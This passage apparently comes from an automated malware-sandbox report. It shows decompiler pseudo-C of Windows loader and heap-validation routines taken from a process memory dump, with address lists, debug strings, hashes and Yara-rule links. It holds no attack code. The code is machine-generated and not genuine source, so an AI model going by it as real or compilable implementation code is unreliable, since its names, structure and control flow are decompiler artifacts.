					_t291 =  *((intOrPtr*)(_t191 + 0x50));
					_t282 =  *((intOrPtr*)(_t284 + 0x10)) + _t272;
					if( *((intOrPtr*)(_t191 + 0x50)) > 0xfffe) {
						_push(_t272);
						E025E3F92(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t291);
						L39:
						_t288 = 0xc0000106;
						goto L20;
					}
					if(( *(_t191 + 4) & 0x00000010) != 0) {
						L27:
						_v1076 =  &_v1160;
						_t286 =  *((intOrPtr*)(_t191 + 0x18)) + _t282;
						_v1080 = _t286;
						if(_t286 == 0) {
							_t288 = 0xc00000e5;
							goto L23;
						}
						_t193 = E025A8342(_t286, 0x5c);
						_pop(_t272);
						if(_t193 == 0) {
							_t288 = 0xc00000e5;
							goto L20;
						}
						_t286 = (_t193 - _t286 >> 0x00000001) + (_t193 - _t286 >> 0x00000001) + 0x00000004 & 0x0000ffff;
						if(_t286 > 0x208) {
							if(_t286 > 0xfffe) {
								goto L39;
							}
							_v1086 = _t286;
							_t200 =  *0x259e6f4(_t286 & 0x0000ffff);
							_v1084 = _t200;
							if(_t200 != 0) {
								_v1076 =  &_v1088;
								goto L30;
							}
							_t288 = 0xc0000017;
							goto L20;
						}
						L30:
						_t292 = _t286 & 0x0000ffff;
						E02592340(_v1076[2], _v1080, _t292 - 2);
						_t272 = 0;
						 *((short*)(_v1076[2] + (_t292 >> 1) * 2 - 2)) = 0;
						_t296 = _t296 + 0xc;
						 *_v1076 = _t286;
						L15:
						if(_v1068 == 0) {
							if(E025ADA3A(_v1076[2],  &_v1128, 0,  &_v1180) == 0) {
								E025E3F92(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _v1076[2]);
								_t288 = 0xc000003a;
								goto L18;
							}
							_v1136 = _v1124;
							_t215 = _v1180;
							if(_t215 != 0) {
								_v1128 = _t215;
								_v1124 = _v1176;
							} else {
								_v1172 = 0;
							}
							_v1200 = _v1172;
							_push(0x21);
							_v1196 =  &_v1128;
							_push(3);
							_push( &_v1212);
							_push( &_v1204);
							_push(0x100020);
							_v1204 = 0x18;
							_v1192 = 0x40;
							_v1188 = 0;
							_v1184 = 0;
							_t288 = L0258FD74( &_v1068);
							E025AA331( &_v1180, _t272,  &_v1180);
							if(_t288 >= 0) {
								goto L16;
							} else {
								_push(_t288);
								E025E3F92(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _v1076[2]);
								goto L18;
							}
						}
						L16:
						_t226 = E025BCC91(_v1164, _a12, _v1076,  &_v1068);
						_t288 = _t226;
						if(_t226 < 0) {
							E025E3F92(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t288);
						} else {
							_t288 = 0;
						}
						goto L18;
					}
					_v1076 = 0;
					_t294 =  *((intOrPtr*)(_t191 + 0x50));
					_v1152 = _t294;
					_v1150 = _t294;
					_v1148 =  *((intOrPtr*)(_t191 + 0x54)) + _t282;
					_v1108 = 0;
					_v1106 = 0x216;
					_v1104 =  &_v544;
					_v1120 = _t272;
					_v1116 = _t286;
					_v1112 = 0;
					_v1100 = 0;
					_v1092 = 0;
					_v1096 = 0;
					_v1132(1,  &_v1120, _v1140);
					if(_v1092 != 0) {
						_t288 = 0xc0000120;
						goto L20;
					}
					if(_v1100 != 0) {
						_t288 = E025BD088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
						if(_t288 >= 0) {
							_t288 = E025BCC91(_v1164, _t286,  &_v1108,  &_v1068);
							if(_t288 >= 0) {
								_t288 = 0;
								goto L20;
							}
							_push(_t288);
							_push(_t286);
							_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
							L50:
							_push(0);
							_push(0x33);
							E025E3F92();
							goto L20;
						}
						_push(_t288);
						_push( &_v1108);
						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
						goto L50;
					}
					_v1144 = _v1112;
					_t250 = _v1096;
					_t286 = 0;
					_v1080 = _t250;
					_v1069 = 1;
					if(_t250 <= 0) {
						L14:
						if(_t286 == _v1080) {
							L59:
							_push(_t286);
							E025E3F92(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
							_t288 = 0xc0150004;
							goto L19;
						}
						goto L15;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_v1120 = _v1144;
						_v1108 = 0;
						_v1106 = 0x216;
						_v1104 =  &_v544;
						_v1116 = _t286;
						_v1112 = 0;
						_v1111 = 0;
						_v1132(2,  &_v1120, _v1140);
						if(_v1112 != 0) {
							break;
						}
						if(_v1111 != 0) {
							if(_v1108 == 0) {
								goto L59;
							}
							_t159 = _t286 + 1; // 0x1
							_v1080 = _t159;
						}
						if(_v1108 != 0) {
							if(_v1068 != 0) {
								E0258F9F0(_v1068);
								_v1068 = 0;
							}
							_t288 = E025BD088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
							if(_t288 >= 0) {
								goto L14;
							} else {
								if(_t288 == 0xc0150004) {
									goto L13;
								} else {
									_push(_t288);
									_push( &_v1152);
									E025E3F92(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1108);
									goto L19;
								}
								goto L27;
							}
						}
						L13:
						_t286 = _t286 + 1;
						if(_t286 < _v1080) {
							continue;
						}
						goto L14;
					}
					_t288 = 0xc0000120;
					goto L19;
				}
			}

0x025bc5fb
0x025bc602
0x025bc608
0x025bc60b
0x025bc60e
0x025bc617
0x025bc61f
0x025bc62e
0x025bc63c
0x025bc642
0x025bc644
0x025bc647
0x025bc64a
0x025bc650
0x025bc656
0x025bc65c
0x025bc662
0x025bc669
0x025bc670
0x025bc676
0x025bc67d
0x025bc684
0x025bc68a
0x025bc692
0x025f557b
0x025f557d
0x025f557d
0x025f557e
0x025f557f
0x025f5580
0x025f558e
0x025f5596
0x025bc874
0x025bc87a
0x025bc89d
0x025bc8a3
0x025f55a6
0x025f55a6
0x025bc8af
0x025f55b7
0x025f55b7
0x025bc8bb
0x025d22ee
0x025d22ee
0x025bc8c1
0x025bc8d1
0x025bc8d1
0x025bc87c
0x025bc888
0x025bc897
0x00000000
0x025bc897
0x025bc69a
0x025d22f8
0x00000000
0x025bc6b2
0x025bc6b8
0x00000000
0x00000000
0x025bc6c6
0x025bc6d4
0x025bc6d6
0x025bc6d9
0x025bc6e1
0x025f5384
0x025f538e
0x025f5396
0x025f5396
0x00000000
0x025f5396
0x025bc6eb
0x025d2196
0x025d219c
0x025d21a5
0x025d21a7
0x025d21ad
0x025f53a0
0x00000000
0x025f53a0
0x025d21b6
0x025d21bc
0x025d21bf
0x025f53aa
0x00000000
0x025f53aa
0x025d21cd
0x025d21d8
0x025f53bc
0x00000000
0x00000000
0x025f53c2
0x025f53c9
0x025f53cf
0x025f53d7
0x025f53e9
0x00000000
0x025f53e9
0x025f53d9
0x00000000
0x025f53d9
0x025d21de
0x025d21de
0x025d21f4
0x025d2204
0x025d2206
0x025d2211
0x025d2217
0x025bc841
0x025bc847
0x025d223e
0x025f5405
0x025f540d
0x00000000
0x025f540d
0x025d224a
0x025d2250
0x025d2259
0x025f552f
0x025f553b
0x025d225f
0x025d225f
0x025d225f
0x025d226b
0x025d2271
0x025d2279
0x025d227f
0x025d2287
0x025d228e
0x025d228f
0x025d229b
0x025d22a5
0x025d22af
0x025d22b5
0x025d22c0
0x025d22c9
0x025d22d0
0x00000000
0x025d22d6
0x025f554c
0x025f5558
0x00000000
0x025f555d
0x025d22d0
0x025bc84d
0x025bc863
0x025bc868
0x025bc86c
0x025f556e
0x025bc872
0x025bc872
0x025bc872
0x00000000
0x025bc86c
0x025bc6f7
0x025bc6fd
0x025bc701
0x025bc708
0x025bc714
0x025bc71c
0x025bc728
0x025bc735
0x025bc744
0x025bc74a
0x025bc750
0x025bc756
0x025bc75c
0x025bc762
0x025bc768
0x025bc774
0x025f5417
0x00000000
0x025f5417
0x025bc780
0x025f5451
0x025f5455
0x025f548e
0x025f5492
0x025f549d
0x00000000
0x025f549d
0x025f5494
0x025f5495
0x025f5496
0x025f5464
0x025f5464
0x025f5465
0x025f5467
0x00000000
0x025f546c
0x025f5457
0x025f545e
0x025f545f
0x00000000
0x025f545f
0x025bc78c
0x025bc792
0x025bc798
0x025bc79a
0x025bc7a0
0x025bc7a9
0x025bc835
0x025bc83b
0x025f54df
0x025f54df
0x025f54ef
0x025f54f7
0x00000000
0x025f54f7
0x00000000
0x00000000
0x00000000
0x00000000
0x025bc7af
0x025bc7af
0x025bc7bb
0x025bc7c3
0x025bc7cf
0x025bc7dc
0x025bc7eb
0x025bc7f1
0x025bc7f7
0x025bc7fd
0x025bc809
0x00000000
0x00000000
0x025bc815
0x025f54ab
0x00000000
0x00000000
0x025f54ad
0x025f54b0
0x025f54b0
0x025bc822
0x025bd03e
0x025f54c1
0x025f54c6
0x025f54c6
0x025bd074
0x025bd078
0x00000000
0x025bd07e
0x025f54d7
0x00000000
0x025f54dd
0x025f550b
0x025f5512
0x025f5522
0x00000000
0x025f5527
0x00000000
0x025f54d7
0x025bd078
0x025bc828
0x025bc828
0x025bc82f
0x00000000
0x00000000
0x00000000
0x025bc82f
0x025f5501
0x00000000
0x025f5501

Strings

SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 025F5496
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 025F53FD
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 025F5586
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 025F551A
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 025F5566
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 025F54E7
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 025F545F
@, xrefs: 025D22A5
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 025F5550
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 025F5386
RtlpResolveAssemblyStorageMapEntry, xrefs: 025F5581

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: fb04ee6f5c4e108ef3618afd202f11531e643d79c26cc351df19f13643340ffd
Instruction ID: 48e8325c92dcbc691af539bd4883e42daf4d67d69a5bdcf822c250ad8ec5dd8c
Opcode Fuzzy Hash: fb04ee6f5c4e108ef3618afd202f11531e643d79c26cc351df19f13643340ffd
Instruction Fuzzy Hash: 940229F29002289FDF61DF54CC84AEAB7B9BF49305F4445EAA609A7211E7309E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0264098E, Relevance: 11.7, Strings: 9, Instructions: 401
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E0264098E(void* __ecx, unsigned int __edx, signed int _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int* _v16;
				signed int _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t165;
				intOrPtr _t168;
				signed short _t181;
				intOrPtr _t183;
				signed int* _t204;
				signed int _t209;
				signed int _t214;
				signed int* _t216;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				intOrPtr _t235;
				intOrPtr _t246;
				intOrPtr _t257;
				signed int _t280;
				signed int* _t281;
				signed int* _t282;
				signed short _t284;
				signed short _t286;
				signed char _t288;
				intOrPtr* _t298;
				signed int _t309;
				signed int _t310;
				signed int* _t311;
				unsigned int _t312;
				signed int* _t313;
				signed int _t314;
				signed int _t315;
				intOrPtr _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;

				_t308 = __edx;
				_t311 = _a4;
				_v12 = 0;
				_v8 = 0;
				_v16 = _t311;
				if(E0263FB7A(__ecx, __edx, _t311, 0) == 0) {
					L84:
					E026406F9(_v16);
					_t337 = _v8;
					if(_v8 != 0) {
						_a4 = _a4 & 0x00000000;
						E025A4167(_t308, _t337, 0xffffffff,  &_v8,  &_a4, 0x8000);
					}
					L48:
					return 0;
				}
				if(_a8 != 0 || (_t311[0x10] & 0x20000000) != 0) {
					_t308 = 0;
					_t165 =  &(_t311[0x31]);
					_t280 =  *_t165;
					_a8 = 0;
					_v24 = 0;
					while(_t165 != _t280) {
						_t280 =  *_t280;
						_a4 =  *_t313 & 0x0000ffff;
						_t288 = _t313[0];
						_v16 = _t313;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							_t168 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t168 + 0xc);
							if( *(_t168 + 0xc) == 0) {
								_push("HEAP: ");
								E025E373B();
							} else {
								E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t313);
							E025E373B("dedicated (%04x) free list element %p is marked busy\n", _a4);
							L22:
							__eflags = _t311[0x13];
							if(_t311[0x13] != 0) {
								_t313[0] = _t313[0] ^ _t313[0] ^  *_t313;
								 *_t313 =  *_t313 ^ _t311[0x14];
							}
							goto L84;
						}
						_t181 =  *_t313 & 0x0000ffff;
						__eflags = _t181 - _v24;
						if(_t181 < _v24) {
							_t183 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t183 + 0xc);
							if( *(_t183 + 0xc) == 0) {
								_push("HEAP: ");
								E025E373B();
							} else {
								E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							E025E373B("Non-Dedicated free list element %p is out of order\n", _t313);
							goto L22;
						}
						_t308 = 0;
						_v24 = _t181 & 0x0000ffff;
						__eflags = _t311[0x13];
						if(_t311[0x13] != 0) {
							_t313[0] = _t313[0] ^ _t288 ^  *_t313;
							 *_t313 =  *_t313 ^ _t311[0x14];
							__eflags =  *_t313;
						}
						_t29 =  &_a8;
						 *_t29 = _a8 + 1;
						__eflags =  *_t29;
						_t165 =  &(_t311[0x31]);
					}
					_a4 = 0x208 + (_t311[0x22] & 0x0000ffff) * 4;
					if( *0x26792a4 != 0 && _t311[0x30] != _t308) {
						_push(4);
						_push(0x1000);
						_push( &_a4);
						_push(0);
						_push( &_v8);
						if(E0258FAD0(0xffffffff) >= 0) {
							_v12 = _v8 + 0x204;
						}
					}
					_t204 =  &(_t311[0x28]);
					_t314 =  *_t204;
					while(_t204 != _t314) {
						__eflags = _t311[0x13];
						_t281 = _t314 + 0x18;
						if(_t311[0x13] != 0) {
							 *_t281 =  *_t281 ^ _t311[0x14];
							__eflags = _t281[0] - (_t281[0] ^ _t281[0] ^  *_t281);
							if(__eflags != 0) {
								_push(0);
								_push(_t281);
								_push(_t311);
								E0263F8EE(_t281, _t311, _t314, __eflags);
							}
						}
						_t295 = _v12;
						__eflags = _t295;
						if(_t295 == 0) {
							L39:
							__eflags =  *(_t314 + 0x1a) & 0x00000004;
							if(( *(_t314 + 0x1a) & 0x00000004) == 0) {
								L41:
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									_t281[0] = _t281[0] ^ _t281[0] ^  *_t281;
									 *_t281 =  *_t281 ^ _t311[0x14];
									__eflags =  *_t281;
								}
								_t314 =  *_t314;
								_t204 =  &(_t311[0x28]);
								continue;
							}
							_t209 = E0262579A(_t295, _t311, _t281);
							__eflags = _t209;
							if(_t209 == 0) {
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									 *(_t314 + 0x1b) =  *(_t314 + 0x1a) ^  *(_t314 + 0x19) ^  *(_t314 + 0x18);
									_t95 = _t314 + 0x18;
									 *_t95 =  *(_t314 + 0x18) ^ _t311[0x14];
									__eflags =  *_t95;
								}
								goto L48;
							}
							goto L41;
						} else {
							_t214 =  *(_t314 + 0xa) & 0x0000ffff;
							__eflags = _t214;
							if(_t214 == 0) {
								goto L39;
							}
							__eflags = _t214 & 0x00008000;
							if((_t214 & 0x00008000) == 0) {
								__eflags = _t214 & 0x00000800;
								if((_t214 & 0x00000800) != 0) {
									goto L39;
								}
								__eflags = _t214 - _t311[0x22];
								if(_t214 >= _t311[0x22]) {
									goto L39;
								}
								L38:
								_t216 = _t295 + (_t214 & 0x0000ffff) * 4;
								_t295 =  *(_t314 + 0x10) >> 3;
								 *_t216 =  *_t216 + ( *(_t314 + 0x10) >> 3);
								__eflags =  *_t216;
								goto L39;
							}
							_t214 = _t214 & 0x00007fff;
							_t295 = 0x81;
							__eflags = _t214 - 0x81;
							if(_t214 >= 0x81) {
								goto L39;
							}
							_t295 = _v8;
							goto L38;
						}
					}
					_v20 = _v20 & 0x00000000;
					_v24 = _v24 & 0x00000000;
					_t282 =  &(_t311[0x2a]);
					_t315 =  *_t282;
					while(_t315 != _t282) {
						_t226 = L0263FDDD(_t311, _t315 - 0x10, 0,  &_v20,  &_v24,  &_v16, _v12, _v8);
						__eflags = _t226;
						if(_t226 == 0) {
							goto L84;
						}
						_t315 =  *_t315;
					}
					_t316 = _a8;
					_v16 = _t311;
					if(_t316 == _v20) {
						__eflags = _t311[0x1e] - _v24;
						if(_t311[0x1e] == _v24) {
							_t228 = _v8;
							__eflags = _t228;
							if(_t228 == 0) {
								goto L74;
							}
							_t317 = _t311[0x30];
							__eflags = _t317;
							if(_t317 == 0) {
								L68:
								_t318 = _t311[0x23];
								__eflags = _t318;
								if(__eflags == 0) {
									L73:
									_a4 = 0;
									E025A4167(_t308, __eflags, 0xffffffff,  &_v8,  &_a4, 0x8000);
									goto L74;
								}
								_t233 = _t311[0x22] & 0x0000ffff;
								_t284 = 1;
								_t308 = 1;
								__eflags = 1 - _t233;
								if(__eflags >= 0) {
									goto L73;
								}
								_t312 = _v12;
								while(1) {
									_t309 = _t284 & 0x0000ffff;
									_t308 =  *(_t312 + _t309 * 4);
									_t318 = _t318 + 0x40;
									__eflags =  *(_t312 + _t309 * 4) -  *((intOrPtr*)(_t318 + 8));
									if( *(_t312 + _t309 * 4) !=  *((intOrPtr*)(_t318 + 8))) {
										break;
									}
									_t284 = _t284 + 1;
									__eflags = _t284 - _t233;
									if(__eflags < 0) {
										continue;
									}
									goto L73;
								}
								_t235 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t235 + 0xc);
								if( *(_t235 + 0xc) == 0) {
									_push("HEAP: ");
									E025E373B();
								} else {
									E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_t298 = _t312 + (_t284 & 0x0000ffff) * 4;
								_push(_t298);
								_push( *_t298);
								_t319 = _t318 + 0x10;
								__eflags = _t319;
								_push( *((intOrPtr*)(_t319 - 8)));
								_push(_t319);
								E025E373B("Tag %04x (%ws) size incorrect (%x != %x) %p\n", _t284 & 0x0000ffff);
								goto L84;
							}
							_t286 = 1;
							__eflags = 1;
							while(1) {
								_t310 = _t286 & 0x0000ffff;
								_t308 =  *(_t228 + _t310 * 4);
								_t317 = _t317 + 0xc;
								__eflags =  *(_t228 + _t310 * 4) -  *((intOrPtr*)(_t317 + 8));
								if( *(_t228 + _t310 * 4) !=  *((intOrPtr*)(_t317 + 8))) {
									break;
								}
								_t286 = _t286 + 1;
								_t308 = 0x81;
								__eflags = _t286 - 0x81;
								if(_t286 < 0x81) {
									continue;
								}
								goto L68;
							}
							_t246 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t246 + 0xc);
							if( *(_t246 + 0xc) == 0) {
								_push("HEAP: ");
								E025E373B();
							} else {
								E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_v8 + (_t286 & 0x0000ffff) * 4)));
							_push( *((intOrPtr*)(_t317 + 8)));
							E025E373B("Pseudo Tag %04x size incorrect (%x != %x) %p\n", _t286 & 0x0000ffff);
							goto L84;
						}
						_t257 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t257 + 0xc);
						if( *(_t257 + 0xc) == 0) {
							_push("HEAP: ");
							E025E373B();
						} else {
							E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_t311[0x1e]);
						_push(_v24);
						_push("Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)\n");
						L57:
						E025E373B();
						goto L84;
					}
					if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
						_push("HEAP: ");
						E025E373B();
					} else {
						E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t316);
					_push(_v20);
					_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
					goto L57;
				} else {
					L74:
					return 1;
				}
			}

0x0264098e
0x02640999
0x026409a0
0x026409a3
0x026409a6
0x026409b0
0x02640e2c
0x02640e2f
0x02640e34
0x02640e38
0x02640e3e
0x02640e51
0x02640e51
0x02640c22
0x00000000
0x02640c22
0x026409ba
0x026409c9
0x026409cb
0x026409d1
0x026409d3
0x026409d6
0x02640a47
0x02640a01
0x02640a03
0x02640a06
0x02640a09
0x02640a0c
0x02640a0f
0x02640aa7
0x02640aaa
0x02640aae
0x02640ad0
0x02640ad5
0x02640ab0
0x02640ac8
0x02640acd
0x02640adb
0x02640ae4
0x02640aec
0x02640aec
0x02640af0
0x02640afe
0x02640b04
0x02640b04
0x00000000
0x02640af0
0x02640a15
0x02640a18
0x02640a1c
0x02640b11
0x02640b14
0x02640b18
0x02640b3a
0x02640b3f
0x02640b1a
0x02640b32
0x02640b37
0x02640b4b
0x00000000
0x02640b51
0x02640a25
0x02640a27
0x02640a2a
0x02640a2d
0x02640a36
0x02640a3c
0x02640a3c
0x02640a3c
0x02640a3e
0x02640a3e
0x02640a3e
0x02640a41
0x02640a41
0x02640a60
0x02640a63
0x02640a6d
0x02640a6f
0x02640a77
0x02640a78
0x02640a7d
0x02640a87
0x02640a91
0x02640a91
0x02640a87
0x02640a94
0x02640a9a
0x02640bf0
0x02640b54
0x02640b58
0x02640b5b
0x02640b60
0x02640b6a
0x02640b6d
0x02640b6f
0x02640b71
0x02640b72
0x02640b73
0x02640b73
0x02640b6d
0x02640b78
0x02640b7b
0x02640b7d
0x02640bc1
0x02640bc1
0x02640bc5
0x02640bd2
0x02640bd2
0x02640bd6
0x02640be0
0x02640be6
0x02640be6
0x02640be6
0x02640be8
0x02640bea
0x00000000
0x02640bea
0x02640bc9
0x02640bce
0x02640bd0
0x02640c0a
0x02640c0e
0x02640c19
0x02640c1f
0x02640c1f
0x02640c1f
0x02640c1f
0x00000000
0x02640c0e
0x00000000
0x02640b7f
0x02640b7f
0x02640b83
0x02640b86
0x00000000
0x00000000
0x02640b88
0x02640b8d
0x02640ba3
0x02640ba8
0x00000000
0x00000000
0x02640baa
0x02640bb1
0x00000000
0x00000000
0x02640bb3
0x02640bb6
0x02640bbc
0x02640bbf
0x02640bbf
0x00000000
0x02640bbf
0x02640b8f
0x02640b94
0x02640b99
0x02640b9c
0x00000000
0x00000000
0x02640b9e
0x00000000
0x02640b9e
0x02640b7d
0x02640bf8
0x02640bfc
0x02640c00
0x02640c06
0x02640c51
0x02640c42
0x02640c47
0x02640c49
0x00000000
0x00000000
0x02640c4f
0x02640c4f
0x02640c55
0x02640c58
0x02640c5e
0x02640cb3
0x02640cb6
0x02640cff
0x02640d04
0x02640d06
0x00000000
0x00000000
0x02640d08
0x02640d0e
0x02640d10
0x02640d2e
0x02640d2e
0x02640d34
0x02640d36
0x02640d60
0x02640d6f
0x02640d72
0x00000000
0x02640d72
0x02640d38
0x02640d41
0x02640d42
0x02640d44
0x02640d47
0x00000000
0x00000000
0x02640d49
0x02640d4c
0x02640d4c
0x02640d4f
0x02640d52
0x02640d55
0x02640d58
0x00000000
0x00000000
0x02640d5a
0x02640d5b
0x02640d5e
0x00000000
0x00000000
0x00000000
0x02640d5e
0x02640ddb
0x02640dde
0x02640de1
0x02640e03
0x02640e08
0x02640de3
0x02640dfb
0x02640e00
0x02640e11
0x02640e14
0x02640e15
0x02640e17
0x02640e17
0x02640e1a
0x02640e1d
0x02640e24
0x00000000
0x02640e29
0x02640d14
0x02640d14
0x02640d15
0x02640d15
0x02640d18
0x02640d1b
0x02640d1e
0x02640d21
0x00000000
0x00000000
0x02640d23
0x02640d24
0x02640d29
0x02640d2c
0x00000000
0x00000000
0x00000000
0x02640d2c
0x02640d86
0x02640d89
0x02640d8c
0x02640dae
0x02640db3
0x02640d8e
0x02640da6
0x02640dab
0x02640dbf
0x02640dc2
0x02640dcb
0x00000000
0x02640dd0
0x02640cbe
0x02640cc1
0x02640cc5
0x02640ce7
0x02640cec
0x02640cc7
0x02640cdf
0x02640ce4
0x02640cf2
0x02640cf5
0x02640cf8
0x02640ca3
0x02640ca3
0x00000000
0x02640ca8
0x02640c6d
0x02640c8f
0x02640c94
0x02640c6f
0x02640c87
0x02640c8c
0x02640c9a
0x02640c9b
0x02640c9e
0x00000000
0x02640d77
0x02640d77
0x00000000
0x02640d77

Strings

HEAP: , xrefs: 02640AD0, 02640B3A, 02640C8F, 02640CE7, 02640DAE, 02640E03, 02640E14, 02640E15
HEAP[%wZ]: , xrefs: 02640AC3, 02640B2D, 02640C82, 02640CDA, 02640DA1, 02640DF6
Pseudo Tag %04x size incorrect (%x != %x) %p, xrefs: 02640DC6
Tag %04x (%ws) size incorrect (%x != %x) %p, xrefs: 02640E1F
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 02640C9E
dedicated (%04x) free list element %p is marked busy, xrefs: 02640ADF
Total size of free blocks in arena (%ld) does not match number total in heap header (%ld), xrefs: 02640CF8
Non-Dedicated free list element %p is out of order, xrefs: 02640B46
RtlFreeHeap, xrefs: 02640996

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
API String ID: 0-3316276410
Opcode ID: cb02b9ed1e5404c788051d56f356bb80f1ba9b13dbf6dd1921043d7c224cbe03
Instruction ID: af5b8eae04508ab4f29a4b67b04c375901826044ba3f4dd40486033dc1410e4c
Opcode Fuzzy Hash: cb02b9ed1e5404c788051d56f356bb80f1ba9b13dbf6dd1921043d7c224cbe03
Instruction Fuzzy Hash: A1F1DF71500665EFEB28DF24C480FAABBF5FF05718F048099E9C69B281DB30AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02641238, Relevance: 10.3, Strings: 8, Instructions: 324
COMMONCrypto

Download Yara Rule

